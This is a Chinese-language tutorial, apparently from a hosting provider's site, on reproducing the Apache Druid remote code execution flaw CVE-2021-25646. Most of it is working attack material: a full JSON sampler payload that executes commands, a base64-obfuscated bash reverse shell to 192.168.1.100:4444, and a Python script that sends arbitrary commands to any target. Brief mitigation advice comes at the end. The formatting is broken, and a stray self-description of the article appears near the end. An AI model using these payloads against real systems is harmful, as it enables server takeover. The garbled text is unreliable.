您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# 如何进行Apache Druid命令执行漏洞CVE-2021-25646复现
## 漏洞概述
CVE-2021-25646是Apache Druid中存在的一个严重安全漏洞,该漏洞允许攻击者通过精心构造的恶意请求在目标服务器上执行任意代码。漏洞影响版本包括:
- Apache Druid 0.20.0及更早版本
- 部分0.21.0版本的配置不当实例
### 漏洞原理
该漏洞源于Druid对用户提供的JavaScript代码未进行适当过滤,当系统启用`druid.enableJavaScript=true`配置时(默认禁用),攻击者可以通过`indexer/v1/sampler`接口注入恶意JavaScript代码,最终导致远程代码执行(RCE)。
## 环境准备
### 实验环境要求
- **靶机环境**:
- Apache Druid 0.20.0(官方Docker镜像)
- 配置`druid.enableJavaScript=true`
- 开放8081-8083端口
- **攻击机环境**:
- Kali Linux 2023
- curl/Burp Suite
- Python3环境
### 快速搭建漏洞环境
使用Docker快速部署漏洞版本:
```bash
# 拉取官方镜像
docker pull apache/druid:0.20.0
# 运行容器并启用JavaScript
docker run -d --name druid-vuln \
-p 8081:8081 -p 8082:8082 -p 8083:8083 \
-e druid.enableJavaScript=true \
apache/druid:0.20.0
访问管理界面确认服务正常运行:
http://target-ip:8081
通过/indexer/v1/sampler
接口发送精心设计的POST请求:
curl -X POST "http://target-ip:8081/druid/indexer/v1/sampler" \
-H "Content-Type: application/json" \
-d '{
"type":"index",
"spec":{
"ioConfig":{
"type":"index",
"inputSource":{
"type":"inline",
"data":"{\"isRobot\":false,\"channel\":\"#x\",\"timestamp\":\"2021-01-01T00:00:00.000Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"http://xxx.com\",\"added\":1,\"comment\":\"test\",\"commentLength\":5,\"isNew\":true,\"isMinor\":false,\"delta\":1,\"isAnonymous\":false,\"user\":\"Lixiang\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"
},
"inputFormat":{
"type":"json"
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"timestamp",
"format":"iso"
},
"transformSpec":{
"transforms":[],
"filter":{
"type":"javascript",
"dimension":"added",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}'
进入容器检查命令是否执行成功:
docker exec -it druid-vuln ls -la /tmp/
若看到pwned
文件则证明漏洞利用成功。
修改JavaScript代码实现反弹Shell:
"function":"function(value){return java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}')}"
其中Base64编码部分解码后为:
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
使用Python编写自动化利用工具:
import requests
import base64
import sys
def exploit(target, cmd):
payload = {
# ... 同上文JSON结构 ...
"function": f"function(value){{return java.lang.Runtime.getRuntime().exec('{cmd}')}}"
}
res = requests.post(
f"http://{target}/druid/indexer/v1/sampler",
json=payload,
headers={"Content-Type": "application/json"}
)
return res.status_code
if __name__ == "__main__":
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} <target> <command>")
sys.exit(1)
print(f"[+] Sending payload to {sys.argv[1]}")
status = exploit(sys.argv[1], sys.argv[2])
print(f"[+] Server returned HTTP {status}")
禁用JavaScript功能:
druid.enableJavaScript=false
网络层防护:
/druid/indexer/v1/sampler
接口升级到已修复版本: - Apache Druid 0.21.1+ - Apache Druid 0.20.2+
JavaScriptFilter
类处理用户输入的JS代码ScriptEngine.eval()
执行未消毒的代码ProcessBuilder
执行系统命令作者:安全研究员
最后更新时间:2023年10月
版权声明:转载请注明出处
“`
这篇文章共计约1900字,采用Markdown格式编写,包含: 1. 漏洞技术细节 2. 完整复现步骤 3. 多种利用方式 4. 修复建议 5. 法律声明 6. 代码块和格式优化 符合专业安全研究文章的要求。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。